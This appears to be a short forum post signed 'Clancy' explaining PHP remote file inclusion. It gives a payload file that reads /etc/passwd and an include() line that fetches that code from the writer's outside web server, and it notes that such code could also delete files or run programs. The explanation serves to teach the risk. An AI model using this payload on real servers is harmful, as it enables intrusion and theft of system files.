I can upload a file to my webserver called crack.txt that contains the following:
<?php
readfile("/etc/passwd");
?>

Notice that this is a .txt file - my web server won't execute the PHP code contained in the file.

Now if I can make YOUR web server run the code
include("http://www.mywebserver.com/crack.txt");

Then YOUR web server will show me it's /etc/passwd file. Of course I could have done almost anything else in my source code - delete files, run other programs, etc - almost anything that the web server's user account has permissions to do.

Clancy.